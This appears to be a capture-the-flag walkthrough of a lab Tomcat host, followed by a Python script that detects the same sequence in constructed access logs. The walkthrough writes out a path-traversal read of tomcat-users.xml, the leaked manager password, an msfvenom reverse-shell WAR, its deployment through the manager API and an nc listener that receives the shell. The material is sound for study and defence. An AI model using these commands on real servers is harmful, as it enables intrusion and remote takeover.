view-source:http://megahosting.htb/news.php?file=../../../../usr/share/tomcat9/etc/tomcat-users.xml
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="tomcat" password="$3cureP4s5w0rd123!" roles="admin-gui,manager-script"/>
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.161 LPORT=6969 -f war -o shell.war
Payload size: 1091 bytes
Final size of war file: 1091 bytes
Saved as: shell.war
Because the password has special characters, look up the docs for the Tomcat 9 manager CLI:
https://tomcat.apache.org/tomcat-9.0-doc/host-manager-howto.html
$ curl -u tomcat:'$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/list
OK - Listed applications for virtual host [localhost]
/:running:0:ROOT
/examples:running:0:/usr/share/tomcat9-examples/examples
/host-manager:running:2:/usr/share/tomcat9-admin/host-manager
/manager:running:0:/usr/share/tomcat9-admin/manager
/docs:running:0:/usr/share/tomcat9-docs/docs
$ curl -u tomcat:'$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/deploy?path=/kashz --upload-file rev.war
OK - Deployed application at context path [/kashz]
$ curl http://10.10.10.194:8080/kashz
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.194] 59472
whoami;id
tomcat
uid=997(tomcat) gid=997(tomcat) groups=997(tomcat)
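
A defender-side view of the sequence above, as an added example that is not part of the original notes: a Python check over access-log lines that flags the traversal read, the manager text-API deploy, and the first request to the newly deployed context. The log lines are constructed, and the Common Log Format and the merging of web-server and Tomcat logs into one stream are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Common Log Format (assumed; not real logs from the host).
SAMPLE_LOG = """\
10.10.16.161 - - [01/Jul/2020:10:00:01 +0000] "GET /news.php?file=notice HTTP/1.1" 200 1574
10.10.16.161 - - [01/Jul/2020:10:00:09 +0000] "GET /news.php?file=..%2F..%2F..%2F..%2Fusr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1" 200 2325
10.10.16.161 - tomcat [01/Jul/2020:10:02:30 +0000] "GET /manager/text/list HTTP/1.1" 200 312
10.10.16.161 - tomcat [01/Jul/2020:10:03:02 +0000] "PUT /manager/text/deploy?path=/kashz HTTP/1.1" 200 52
10.10.16.161 - - [01/Jul/2020:10:03:10 +0000] "GET /kashz HTTP/1.1" 302 -
"""

# client ip, authenticated user, method, request target, status
LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def findings(log_text):
    """Return (rule, client_ip, detail) tuples in log order."""
    out = []
    deployed = set()  # context paths created through the manager text API
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, user, method, target, status = m.groups()
        url = urlsplit(target)
        params = parse_qsl(url.query)  # parse_qsl percent-decodes the values
        # Rule 1: a ".." path segment in any query parameter (decoded once more
        # to catch double encoding, backslashes normalised).
        for name, value in params:
            if ".." in unquote(value).replace("\\", "/").split("/"):
                out.append(("path-traversal", ip, name))
        # Rule 2: successful deployment via /manager/text/deploy (curl --upload-file sends PUT).
        if method == "PUT" and url.path == "/manager/text/deploy" and status == "200":
            ctx = dict(params).get("path", "")
            deployed.add(ctx)
            out.append(("manager-deploy", ip, f"{user}:{ctx}"))
        # Rule 3: any request to a context that was deployed earlier in this log.
        elif any(c and (url.path == c or url.path.startswith(c + "/")) for c in deployed):
            out.append(("new-context-hit", ip, url.path))
    return out

if __name__ == "__main__":
    for finding in findings(SAMPLE_LOG):
        print(finding)
```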